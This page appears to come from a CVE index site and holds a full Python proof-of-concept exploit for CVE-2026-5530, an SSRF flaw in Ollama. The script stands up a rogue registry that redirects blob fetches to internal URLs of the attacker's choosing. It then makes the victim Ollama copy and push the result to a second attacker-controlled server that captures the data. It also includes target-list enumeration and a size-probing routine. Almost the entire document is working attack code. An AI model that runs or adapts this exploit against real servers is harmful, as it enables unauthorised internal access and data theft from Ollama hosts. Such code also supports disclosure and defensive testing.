5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-5530 - Ollama SSRF via Registry Redirect + Exfiltration

  python3 poc.py targets.txt --registry-host host.docker.internal          # enum
  python3 poc.py URL --exfil --size 960 --registry-host host.docker.internal  # exfil
  python3 poc.py URL --probe --registry-host host.docker.internal             # probe + exfil

Author: David Rochester
"""

import argparse, hashlib, json, os, sys, threading, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import Request, urlopen

# Module-level state shared between main(), probe() and the HTTP handler
# classes (handlers are instantiated per request, so they read these globals).

# Content-Length the rogue registry reports for blob HEAD requests.
declared_size = 256
# URL the rogue registry redirects blob GET requests to; set per target in main().
current_target = None
# Payloads received by the Exfil handler's PUT finalisation, in arrival order.
exfil_blobs = []
# True when running in --exfil or --probe mode; enables the "[SSRF]" log line.
any_exfil = False
# Port the Exfil server listens on; also used to build the destination model URL.
exfil_port = 10000
# Seed for make_digest(); bumped before each pull so every pull sees a new digest.
pull_counter = int(time.time())
# Hostname placed in the model URLs handed to the Ollama API.
registry_host = "127.0.0.1"

def make_digest():
    """Return a ``sha256:<hex>`` digest string derived from ``pull_counter``.

    The digest is the SHA-256 of the counter's decimal text, so it changes
    whenever the module-level ``pull_counter`` is incremented.
    """
    seed = str(pull_counter).encode()
    hex_part = hashlib.sha256(seed).hexdigest()
    return f"sha256:{hex_part}"

def make_manifest():
    """Build the manifest served by the rogue registry.

    Returns:
        A ``(manifest_bytes, digest)`` tuple. ``manifest_bytes`` is the
        JSON-encoded schema-v2 manifest; its config and its single layer both
        reference ``digest`` (from ``make_digest()``) with a size of 1.
    """
    digest = make_digest()
    # Key insertion order is kept as-is so the serialised bytes do not change.
    config_entry = {
        "mediaType": "application/vnd.docker.container.image.v1+json",
        "digest": digest,
        "size": 1,
    }
    layer_entry = {
        "mediaType": "application/vnd.ollama.image.model",
        "digest": digest,
        "size": 1,
    }
    document = {
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": config_entry,
        "layers": [layer_entry],
    }
    return json.dumps(document).encode(), digest


class Rogue(BaseHTTPRequestHandler):
    """Registry-like handler that answers GET and HEAD requests.

    Routes (query string ignored):
      * ``/v2`` or ``/v2/``   -> 200 with the registry API version header.
      * ``.../manifests/...`` -> 200 with the manifest from ``make_manifest()``
        (body only on GET).
      * ``.../blobs/...``     -> HEAD: 200 with ``Content-Length`` set to the
        module-level ``declared_size``; GET: 307 redirect to ``current_target``.
      * anything else         -> 404.
    """

    def do_GET(self):
        self._r("GET")

    def do_HEAD(self):
        self._r("HEAD")

    def _respond(self, status, headers=()):
        """Send the status line and the given (name, value) headers, in order."""
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    def _r(self, m):
        """Dispatch a request; ``m`` is the HTTP method name ("GET" or "HEAD")."""
        route = self.path.split("?")[0]
        body, digest = make_manifest()

        if route in ("/v2", "/v2/"):
            self._respond(200, [("Docker-Distribution-API-Version", "registry/2.0")])
            return

        if "/manifests/" in route:
            self._respond(200, [
                ("Content-Type", "application/vnd.docker.distribution.manifest.v2+json"),
                ("Docker-Content-Digest", digest),
                ("Content-Length", str(len(body))),
            ])
            if m == "GET":
                self.wfile.write(body)
            return

        if "/blobs/" not in route:
            self._respond(404)
            return

        if m == "HEAD":
            self._respond(200, [("Content-Length", str(declared_size))])
            return

        # Blob GET: log (exfil/probe modes only), then redirect.
        if any_exfil:
            print(f"  [SSRF] -> {current_target}", flush=True)
        self._respond(307, [("Location", current_target), ("Content-Length", "0")])

    def log_message(self, *a):
        """Silence the default per-request access log."""
        pass


class Exfil(BaseHTTPRequestHandler):
    """Registry-like handler that accepts blob uploads and records them.

    POST opens an upload session, PATCH appends a chunk to it, and PUT
    finalises it: the accumulated bytes are appended to the module-level
    ``exfil_blobs`` list and printed (decoded as UTF-8, first 4096 characters).
    A PUT to a ``/manifests/`` path is acknowledged without being stored.
    """

    # Upload id -> bytes received so far. Stored on the class because a new
    # handler instance is created for every request.
    bufs = {}

    def _respond(self, status, headers=()):
        """Send the status line and the given (name, value) headers, in order."""
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    def _read_body(self):
        """Read the request body as announced by Content-Length (b"" if 0/absent)."""
        length = int(self.headers.get("Content-Length", 0))
        if not length:
            return b""
        return self.rfile.read(length)

    def _host(self):
        """Host to echo back in Location headers; falls back to the configured one."""
        return self.headers.get("Host", f"{registry_host}:{exfil_port}")

    def do_GET(self):
        if self.path.split("?")[0] not in ("/v2", "/v2/"):
            self._respond(404)
            return
        self._respond(200, [("Docker-Distribution-API-Version", "registry/2.0")])

    def do_HEAD(self):
        self._respond(404)

    def do_POST(self):
        if "/blobs/uploads" not in self.path:
            self._respond(404)
            return
        # New upload session keyed by a nanosecond timestamp.
        uid = str(time.time_ns())
        type(self).bufs[uid] = b""
        host = self._host()
        self._respond(202, [
            ("Location", f"http://{host}/v2/library/pwn/blobs/uploads/{uid}"),
            ("Docker-Upload-UUID", uid),
            ("Range", "0-0"),
        ])

    def do_PATCH(self):
        store = type(self).bufs
        uid = self.path.rstrip("/").split("/")[-1].split("?")[0]
        chunk = self._read_body()
        # Chunks for unknown upload ids are read but not stored.
        if uid in store:
            store[uid] = store[uid] + chunk
        host = self._host()
        self._respond(202, [
            ("Location", f"http://{host}{self.path}"),
            ("Range", f"0-{len(store.get(uid, b''))}"),
        ])

    def do_PUT(self):
        if "/blobs/uploads/" in self.path:
            uid = self.path.split("/blobs/uploads/")[-1].split("?")[0]
            tail = self._read_body()
            buf = type(self).bufs.pop(uid, b"") + tail
            if buf:
                exfil_blobs.append(buf)
                print(f"\n  [EXFIL] {len(buf)} bytes:")
                print(buf.decode("utf-8", errors="replace")[:4096])
                print(flush=True)
            content_digest = "sha256:" + hashlib.sha256(buf).hexdigest()
            self._respond(201, [("Docker-Content-Digest", content_digest)])
            return

        if "/manifests/" in self.path:
            # Drain the manifest body, then acknowledge it.
            self._read_body()
            self._respond(201, [("Docker-Content-Digest", make_digest())])
            return

        self._respond(404)

    def log_message(self, *a):
        """Silence the default per-request access log."""
        pass


def pull(api, port):
    """POST a pull request for the ``library/pwn:latest`` model to ``{api}/api/pull``.

    Args:
        api: Base URL of the Ollama API (no trailing slash).
        port: Port of the registry named in the model reference; the host part
            comes from the module-level ``registry_host``.

    Returns:
        True if the request completed within 8 seconds without raising,
        False on any error (HTTP error status, timeout, connection failure,
        malformed URL).
    """
    model = f"http://{registry_host}:{port}/library/pwn:latest"
    payload = json.dumps({"model": model, "insecure": True, "stream": False}).encode()
    try:
        request = Request(f"{api}/api/pull", data=payload,
                          headers={"Content-Type": "application/json"})
        # Close the response explicitly instead of leaving the socket to the GC.
        with urlopen(request, timeout=8):
            pass
    except Exception:
        # Deliberately best-effort: callers only need success/failure (and timing).
        return False
    return True


def exfiltrate(api, port):
    """Copy the pulled model to the exfil registry name, then push it.

    Issues two POSTs against the Ollama API, in order:
      1. ``/api/copy`` from the model at ``registry_host:port`` to the same
         name at ``registry_host:exfil_port`` (10 s timeout);
      2. ``/api/push`` of that destination model (60 s timeout).

    If either request raises, the error is printed and the remaining step is
    skipped. Nothing is returned.

    Args:
        api: Base URL of the Ollama API (no trailing slash).
        port: Port of the registry the model was pulled from.
    """
    model = f"http://{registry_host}:{port}/library/pwn:latest"
    exfil_model = f"http://{registry_host}:{exfil_port}/library/pwn:latest"
    steps = (
        ("/api/copy", {"source": model, "destination": exfil_model}, 10),
        ("/api/push", {"model": exfil_model, "insecure": True, "stream": False}, 60),
    )
    try:
        for endpoint, payload, timeout in steps:
            request = Request(f"{api}{endpoint}",
                              data=json.dumps(payload).encode(),
                              headers={"Content-Type": "application/json"})
            # Close each response explicitly instead of leaving sockets to the GC.
            with urlopen(request, timeout=timeout):
                pass
    except Exception as e:
        print(f"  [-] exfil failed: {e}", flush=True)


def probe(api, port, lo=1, hi=4096, thresh=5.0):
    """Binary-search the largest declared size for which ``pull`` returns quickly.

    Each round sets the module-level ``declared_size`` to the midpoint, bumps
    ``pull_counter``, times one ``pull(api, port)`` call, and treats a duration
    of at least ``thresh`` seconds as "too big".

    Args:
        api: Base URL of the Ollama API, forwarded to ``pull``.
        port: Rogue registry port, forwarded to ``pull``.
        lo: Inclusive lower bound of the search range.
        hi: Inclusive upper bound of the search range.
        thresh: Duration in seconds at or above which a pull counts as slow.

    Returns:
        The final lower bound; ``declared_size`` is left set to the same value.
    """
    global declared_size, pull_counter

    print(f"  [PROBE] binary search [{lo}, {hi}]")
    low, high = lo, hi
    while low < high:
        # Round the midpoint up so that "low = candidate" always makes progress.
        candidate = (low + high + 1) // 2
        declared_size = candidate
        pull_counter += 1

        began = time.time()
        pull(api, port)
        took = time.time() - began

        too_big = took >= thresh
        if too_big:
            tag = "BIG"
        else:
            tag = "OK"
        print(f"  [PROBE] CL={candidate:<6} {took:.1f}s [{tag}]", flush=True)

        if too_big:
            high = candidate - 1
        else:
            low = candidate

    declared_size = low
    print(f"  [PROBE] size={low}\n")
    return low


def load_targets(arg):
    """Resolve the positional ``target`` argument into a list of targets.

    Args:
        arg: Either a path to an existing file with one target per line, or a
            single target string.

    Returns:
        If ``arg`` names an existing file: its lines with surrounding
        whitespace removed, skipping blank lines and ``#`` comment lines
        (including comments that are indented). Otherwise ``[arg]``.
    """
    if not os.path.isfile(arg):
        return [arg]
    with open(arg) as f:
        # Strip before testing for '#', so indented comments are skipped too.
        cleaned = (line.strip() for line in f)
        return [entry for entry in cleaned if entry and not entry.startswith("#")]


def main():
    """Command-line entry point.

    Parses arguments, stores the configuration in the module-level globals,
    starts the ``Rogue`` server (and the ``Exfil`` server in --exfil/--probe
    mode) on daemon threads, then processes each target in turn:

      * --probe: run ``probe()``, then pull and, on success, ``exfiltrate()``;
      * --exfil: pull with the given --size and, on success, ``exfiltrate()``;
      * neither: time a single pull with ``declared_size = 1`` and print
        ALIVE or DOWN/FILTERED.

    Exits with status 1 if --exfil is given without --size or if no targets
    were loaded.
    """
    global current_target, declared_size, pull_counter, exfil_port, registry_host
    global any_exfil

    ap = argparse.ArgumentParser(description="CVE-2026-5530 PoC")
    ap.add_argument("target", help="URL or file with URLs")
    ap.add_argument("-p", "--port", type=int, default=9999)
    ap.add_argument("--exfil-port", type=int, default=10000)
    ap.add_argument("--exfil", action="store_true", help="exfil with known --size")
    ap.add_argument("--probe", action="store_true", help="binary search for size, then exfil")
    ap.add_argument("--size", type=int, default=None, help="Content-Length (use with --exfil)")
    ap.add_argument("--registry-host", default="127.0.0.1",
                    help="hostname Ollama uses to reach this machine (default: 127.0.0.1)")
    ap.add_argument("--ollama", default="http://127.0.0.1:11434")
    args = ap.parse_args()

    if args.exfil and not args.size:
        print("  --exfil requires --size")
        sys.exit(1)

    targets = load_targets(args.target)
    if not targets:
        print("no targets")
        sys.exit(1)

    registry_host = args.registry_host
    exfil_port = args.exfil_port
    if args.size:
        declared_size = args.size

    # The rogue registry is needed in every mode.
    rogue = HTTPServer(("0.0.0.0", args.port), Rogue)
    threading.Thread(target=rogue.serve_forever, daemon=True).start()

    # The upload receiver is only needed when something will be pushed to it.
    wants_exfil = args.exfil or args.probe
    if wants_exfil:
        exfil_srv = HTTPServer(("0.0.0.0", args.exfil_port), Exfil)
        threading.Thread(target=exfil_srv.serve_forever, daemon=True).start()
    any_exfil = wants_exfil

    # --probe takes precedence over --exfil when both are given.
    if args.probe:
        mode = "probe"
    elif args.exfil:
        mode = "exfil"
    else:
        mode = "enum"
    print(f"\n  CVE-2026-5530 | {mode} | {len(targets)} targets\n")

    for t in targets:
        current_target = t

        if not wants_exfil:
            # Enumeration: one timed pull with a 1-byte declared size.
            pull_counter += 1
            declared_size = 1
            began = time.time()
            ok = pull(args.ollama, args.port)
            elapsed = time.time() - began
            if not ok and elapsed >= 5:
                status = "DOWN/FILTERED"
            else:
                status = "ALIVE"
            print(f"  {status}  {elapsed:.1f}s  {t}", flush=True)
            continue

        print(f"  [*] {t}")
        if args.probe:
            # Leaves declared_size set to the size it settled on.
            probe(args.ollama, args.port)
        pull_counter += 1
        if pull(args.ollama, args.port):
            print("  [+] blob captured, exfiltrating...")
            exfiltrate(args.ollama, args.port)
        else:
            print("  [-] pull failed")

    print(f"\n  done. {len(exfil_blobs)} blobs exfiltrated.\n")


if __name__ == "__main__":
    main()